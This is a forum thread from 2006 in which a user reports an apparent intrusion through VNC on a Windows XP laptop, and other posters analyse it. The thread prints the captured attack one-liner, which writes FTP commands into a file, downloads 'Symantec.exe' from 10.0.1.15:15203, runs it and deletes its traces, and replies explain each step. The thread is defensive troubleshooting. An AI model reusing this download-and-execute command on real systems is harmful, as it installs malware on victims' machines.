possible virus / remote access ??

s8n · 30-12-2006 8:57pm #1

Folks,

Strange things started happening the laptop this afternoon (WinXp Pro with SP2 and fully updated OS running Mcafee)

First off the run box popped up and this was entered...

Start > Run > %systemroot%\system32\cmd.exe

Then at the cmd prompt, this was entered...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cho open 10.0.1.15 15203 >> aa &echo user a a >> aa &echo bi
nary >> aa &echo get Symantec.exe >> aa &echo bye >> aa &ftp -n -v -s:aa &del aa
&Symantec.exe
'cho' is not recognized as an internal or external command,
operable program or batch file.
ftp> user a a
Not connected.
ftp> binary
Not connected.
ftp> get Symantec.exe
Not connected.
ftp> bye
'Symantec.exe' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>

All the while VNC was running in the systray and seemed active (I've since deleted VNC).
Was this a remote access attack (and if so how and why ?) or a virus / worm ??

zAbbo · 30-12-2006 9:05pm

Hmm not sure what that was, have you opened VNC without running it through SSH on your router ?

Could be a symantec update script ?

Capt'n Midnight · 31-12-2006 12:40am

what firewall are you using ?

check in scheduled tasks in control panel to see what's supposed to run

cho is a command - search for cho.* to see if it's on your system

it looks like it's trying to download symantec.exe from a server on 10.0.1.15
If it's a coporate PC is this a server on your LAN ?

Was the VNC icon white (no connection) or Black (a commection)

Cake Fiend · 31-12-2006 12:50am

The command is 'echo', only the 'e' got cut off for some reason. Whoever did this echoed ftp commands into a file ('aa'), ran the ftp command to connect to that address on port 15203 (non-standard port, looks dodgy to me) to download this 'symantec.exe' file, then deleted the 'aa' file to cover its tracks, then tried to run the 'symantec.exe' file that should have just been downloaded.

An automatic script (e.g. scheduled task) most likely wouldn't have used the 'run' box. You say that cmd.exe was run from the run box, then all the ftp stuff was entered into the new command box - did you see this happen in real time? Or did you come along and notice that the command box was open with all this stuff in it?

Probably an attack through your VNC server. Check out your version of VNC and see if there are any known exploits for that version and release number. Seems odd to me that someone would do this and then leave a) the command box open and b) the 'run' history there, did you cut them off in the middle of the attack?

s8n · 31-12-2006 1:11pm

thanks for the feedback so far folks, as I said I'm stumped on this....

The attack happened twice in real time before my eyes.
VNC was black so it was in use. It's a company PC, but was NOT connected via VPN to the corporate LAN.
Also Sophos is not in use on the router.

I've since uninstalled VNC and it has'nt happened, but I'd just like to know why it happened and what they were hoping to achieve

seamus · 31-12-2006 2:02pm

The fact that it continually tried to issue ftp commands despite not being connected, is what makes me suspect it was come sort of batch file.

There's also the address 10.0.1.15. This is an internal private address. So unless the attacker knew the layout of your internal network, and had somehow uploaded their malicious file to a machine on this network (or had somehow connected your machine to a VPN).

Very weird.

mukki · 31-12-2006 3:30pm

thats the vnc password bypass bug, just install the newer one, it was a fully automated attic

Cake Fiend · 31-12-2006 9:09pm

seamus wrote:

The fact that it continually tried to issue ftp commands despite not being connected, is what makes me suspect it was come sort of batch file.

This was caused by what was echoed into the file 'aa'. You can pass the ftp command a text file of commands, which it will execute in sequence. The FTP commands this person tried to issue were:

open 10.0.1.15 15203
user a a
binary
get Symantec.exe
bye

As in connect to this IP and port, download this file, then exit the ftp. Of course, since the first 'echo' command bolloxed up, the list of commands wasn't complete (it missed out the 'open' command). If this had been typed properly, the 'Symantec.exe' file would have been downloaded and executed, and the list of ftp commands (file 'aa') was deleted.

As mukki mentioned, there's a well-known password bug with VNC which is most likely what was used to get into your machine. Check the notes on the version you were using for details.

h57xiucj2z946q · 03-01-2007 12:10pm

you got hit by a self spreading botnet using the vnc authbypass vulnerability in Real VNC v4.1.1 However it looks like it was a script kiddy who configured it arse ways and it messed up on him. Chances are it was an infected pc that scaned your ip range, connected and tried to infect your pc. vnc botnets use automated vnc remote software, its not someone doing this manually.

also 10.x.x.x is a LAN ip so i dunno what he was at!

possible virus / remote access ??

Comments